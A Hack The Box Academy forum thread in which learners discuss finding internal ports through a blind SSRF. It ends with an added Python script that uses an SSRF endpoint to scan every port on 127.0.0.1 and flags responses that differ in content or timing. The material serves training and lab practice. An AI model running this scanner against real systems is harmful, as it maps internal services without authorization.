HTB Academy - Server-side Attacks Blind SSRF

I’ve looked through all of the other forums and don’t see anything useful. There are a few cryptic messages, but I am just trying to find other ports open in the Blind SSRF past 80. I currently have Burp going in an Intruder attack, sorting through all port numbers one by one. This, of course, is taking forever. I have tried to ffuf like in Identifying and Exploiting. With Exploiting, raft-small-words gives me a ton of hits.

I also wrote a Python loop to give me every number then fuzzed the port with it and only had 80 come back.

I’ve been stuck on this for 5 days and the CBBH is part of my MS degree and I’m struggling badly. The directions I can follow, but they just end. It talks about getting files, and then the question is to get the other port. I am apparently missing something and need guidance.

Hack The Box - Academy

The Editorial box featured Blind SSRF. I’m not sure if it's still active, but that would be a great place to start.

That box really helped me understand the concept through trial and error.


I was able to eventually ffuf the port number and look at the size of the result.

Yes, I’m stuck on this too. The result is too many ports with “Something went wrong!”, and the length is also not very useful.

Did you find a way?

I think the VPN or the backend server response is very slow, so I can’t do my enumeration properly.
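The approach the thread converges on (generate a full port list, send each port through the blind SSRF, then look for responses that differ from the majority) can be scripted so the baseline is computed from the data rather than eyeballed in ffuf, and so the time each probe took is recorded alongside the body length. The example below is added here and is not code from the thread or from the HTB module; the endpoint URL, the POST parameter name `url` and the internal target `127.0.0.1` are assumptions to be replaced with the real ones, and the `simulated_fetcher` is a constructed stand-in so the script runs offline. Note the practitioner's caveat raised in the last post: the timing check only tells you something when the closed-port baseline is stable, so run it on a quiet connection and rerun any "slow" hits before trusting them.

```python
"""Blind SSRF port enumeration helper (added example, not from the thread)."""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Dict, Iterable, List, Tuple

# One probe result: (HTTP status, response body, seconds the request took)
Probe = Tuple[int, bytes, float]
Fetcher = Callable[[int], Probe]


def ffuf_wordlist(start: int = 1, end: int = 65535) -> str:
    """Newline-separated port list, e.g. for ffuf -w ports.txt -u ...:FUZZ/."""
    return "".join(f"{p}\n" for p in range(start, end + 1))


def http_fetcher(endpoint: str, param: str = "url",
                 target: str = "127.0.0.1", timeout: float = 10.0) -> Fetcher:
    """Build a fetcher that asks the SSRF endpoint to reach http://<target>:<port>/.

    Assumed request shape (hypothetical): POST with one form field named `param`.
    """
    def fetch(port: int) -> Probe:
        data = urllib.parse.urlencode({param: f"http://{target}:{port}/"}).encode()
        req = urllib.request.Request(endpoint, data=data, method="POST")
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read(), time.monotonic() - start
        except urllib.error.HTTPError as err:  # 4xx/5xx bodies are still worth comparing
            return err.code, err.read(), time.monotonic() - start
        except (urllib.error.URLError, OSError):  # timeout or connection failure
            return 0, b"", time.monotonic() - start
    return fetch


def scan(fetch: Fetcher, ports: Iterable[int]) -> Dict[int, Tuple[int, int, float]]:
    """Probe every port and keep (status, body length, elapsed seconds) per port."""
    results = {}
    for port in ports:
        status, body, elapsed = fetch(port)
        results[port] = (status, len(body), elapsed)
    return results


def find_outliers(results: Dict[int, Tuple[int, int, float]],
                  time_factor: float = 3.0) -> List[Tuple[int, str]]:
    """Return (port, reason) for ports that do not look like the closed-port majority.

    Almost every port is closed, so the most common (status, length) pair is taken
    as the closed-port signature. A port is flagged if its pair differs, or if its
    response is identical but took more than `time_factor` times the median, which
    is how a filtered port or a service that accepts and then hangs shows up.
    """
    if not results:
        return []
    baseline, _ = Counter((s, n) for s, n, _ in results.values()).most_common(1)[0]
    median_t = statistics.median(t for _, _, t in results.values())
    flagged = []
    for port in sorted(results):
        status, length, elapsed = results[port]
        if (status, length) != baseline:
            flagged.append((port, f"status/length {status}/{length} differs from baseline {baseline}"))
        elif median_t > 0 and elapsed > time_factor * median_t:
            flagged.append((port, f"slow: {elapsed:.2f}s vs median {median_t:.2f}s"))
    return flagged


def simulated_fetcher(port: int) -> Probe:
    """Constructed stand-in for the real endpoint so the script runs offline:
    80 and 8080 answer with a page, 22 accepts but stalls, everything else is closed."""
    if port in (80, 8080):
        return 200, b"<html>index</html>", 0.06
    if port == 22:
        return 200, b"Something went wrong!", 2.0
    return 200, b"Something went wrong!", 0.05


if __name__ == "__main__":
    # Replace simulated_fetcher with http_fetcher("http://<target>/<ssrf-endpoint>")
    # and the short list with range(1, 65536) against a real target.
    for port, reason in find_outliers(scan(simulated_fetcher, [22, 80, 81, 82, 443, 8080, 8081])):
        print(f"{port:5d}  {reason}")
```

Running it against the simulated endpoint prints 22 as a timing outlier and 80 and 8080 as content outliers, while 81, 82, 443 and 8081 are absorbed into the "Something went wrong!" baseline. Against a real target, sort by reason: content differences are reliable, timing hits need a second pass.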